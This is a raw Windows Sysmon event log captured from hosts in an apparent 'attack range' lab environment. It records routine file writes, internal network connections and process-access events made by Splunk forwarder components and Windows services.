11:25:30.211{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C62BE663486C023FAF81625EC3BD41EB,SHA256=E657BA14D9650C93F7219E537DFC1B91AA5EB882118511DC54B5FDB929D2D223,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222868Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:30.509{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=4F5F5FD663D2F812012FE2D9C37CAF4C,SHA256=7F742EC696A6BE48971C037F75A7813AD69D5417C4139A9B3C8BB0088717B2B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222870Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:31.790{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7084456175E043F889D0386621E8DC7B,SHA256=668F8D175BF4396E7EEA8EF3D244C4F86DA55C42351AC963C14E7030B9CE057C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299059Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:29.651{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49582-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299058Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:31.225{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8718C91E2A6FC22F13377A859F4F8AE0,SHA256=91F97AF79E48B9331BE7932A7AED9D93EF70E45660F04630F5AEB4C6BFD67602,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222872Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:30.528{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51748-false10.0.1.12-8000- 23542300x8000000000000000222871Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:32.837{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBB4659D5C76E80F5B15CA79AFF79448,SHA256=116F101735DB205397CA24108D403EB8EBA4C816D9FF069E0A6A132EF3411DC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299060Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:32.247{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D880C7B6C23FDA32A158517F6E6E55D,SHA256=019933178FC8A56F67E4C42C41D287E68351EDE664B269F988E6A813049E7724,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222873Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:33.853{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A710574AB45A89214C614649A1D24251,SHA256=85590764781BDA46CA3B898AA53E88CDA649B064E8A7017E3D5BA653C2B4D1CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299062Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:33.662{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=2819725FDCD804E24469D1DC5388CDD7,SHA256=AE836671134937A944E98BA4189FF75EA8BBCCDF45AFF679AD8D98F510CF0C3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299061Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:33.262{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AB5C1DDF1B2EE912A58017D97D98CFE,SHA256=4EF0AB16C89413E360859B5D529BC29CDE6083E180634AB8C567D05F6B0E6783,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222874Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:34.868{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=915C7C24F2439387B468CEFF92030A84,SHA256=23E694592FF8D07372C9F91509966C6A49862F9829240B6EC322E54493C3B7CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299063Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:34.278{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11AD1598486216828BB981C866EBF990,SHA256=E0FBD559A704C9EE9F7349BD5AF7B66FEBBED12421E9370F6A3E97FAC90BB89D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222875Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:35.884{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEEE5E33EA357F786A0E09AA17385EE9,SHA256=F8A2A46F3FBB8AC902C1689B6CF1B407FC01777A26EF14308CEC9E767150B01E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299064Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:35.300{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2E0D0907FB9FC288ED32BAF3031ADD1,SHA256=9A9B43394BEF9CFC64FE2467D5A8BBE53FB3C957D5845FEEC218C582FDA27621,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222876Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:36.900{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9B161996F1439B0570173A03D318CAE,SHA256=8E794E9ABCBD4070814CADE2AA9376B338A9366A785782497FD0AA2DFAEF0A05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299065Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:36.315{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6091326EFAB513F6339C58CD816D98FA,SHA256=E10F47D2E874A04861BB9CCA4B6F6D7BBDE6CBE91A27477017A6B17978F7DF0C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299067Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:35.640{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49583-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299066Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:37.330{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B1F1BE78AB04865E1931B3516625AE9,SHA256=B452B940204AFB01B90E288D90F335B6DC90CF4BD95F4C6CD573FC91FE0688D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299068Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:38.345{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=992A6F60463EDEA4D1014A3C689375F6,SHA256=59B3F9305B11C8E855375E770A44701D2FDEF41C257987F50220E95DB8D18943,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222878Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:36.559{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51749-false10.0.1.12-8000- 23542300x8000000000000000222877Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:38.134{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FEE382B79ED240628585566CC5D17D9,SHA256=840791554D3B213607BD70CA4ED90B12C472CFD6F84CF2CD8721EEC03D3FB121,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222879Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:39.134{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1D695B0987BC2AA9679B61E0D62227E,SHA256=CBAE6B860DB5181C3BA4B063F6A3BA101E12D039EDDDF733DA9BAFC6324B504F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299069Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:39.346{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B27C1A99B52687C0C53BFD4F04CBEB4,SHA256=665D669763569F4DBC862990401859975564E4EE6058218087BD289449F6B85D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299071Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:40.729{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299070Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:40.361{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D102BDCFE782625FC01EF30AA899E4C7,SHA256=D3C6698C9C4ABACEA57923688728403C9ABC29CC43F31CECE19A06A57CEB0898,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222880Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:40.181{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3A70BB329E0079504E6BABAC716B23B,SHA256=1955C7058807591DA6651F7FDAF5D7298669305EBF6E6723A6E45EE8DEBA4754,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299072Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:41.375{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=893A859F835FFEA9EB5143D96F9EE5DA,SHA256=FF69AF599E6523A0CD77D1A2BE418CF01160FEC1163FD5A00CE8ABAC98021B22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222881Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:41.196{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF2C0DBC2B5D377223E6E94C22A1B561,SHA256=99F94A25720444F7EC8167857BB94AAA4FAA9BF9A758CA91E53A0AF91A7FD12E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299074Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:40.176{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49584-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000299073Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:42.394{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A58F0737BF0A90BB9710858FFA52686,SHA256=BCD75CC752E8D4B1AA28902A888135694843F4AD30634C3155D89840AC54CE27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222882Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:42.243{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD77E631F49F25299E910BD69D7A6B62,SHA256=D33086B6FF39BF79D1848258CACFB27CA0903AB5BBD005047B21D5DE5E0A0369,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299076Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:41.553{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49585-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299075Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:43.443{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1737AA4C43E700DB4977590BEC864062,SHA256=BA5506EDAB1E3030ED73511FAB3EB90637573E0DF2E474749BBE5BF9656B82FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222883Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:43.337{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD1F5B1F46F1E375D3B1C521809098C3,SHA256=F19A116A22205BB1D6B19107CE6CBD24A7DC20229DB16F1C7AE2C87E1B3833E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299077Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:44.459{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AE701CCD300AE59E41E05E9427EA6F6,SHA256=2F91B2FC7ECA3BFBE52368C595D851EFF03C082E39379DC9F9F8748B549F0B0C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222912Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:44.696{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-19B8-6216-4F05-000000003902}3440C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222911Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:44.696{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222910Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:44.696{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222909Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:44.696{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222908Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:44.696{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222907Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:44.696{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222906Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:44.696{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222905Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 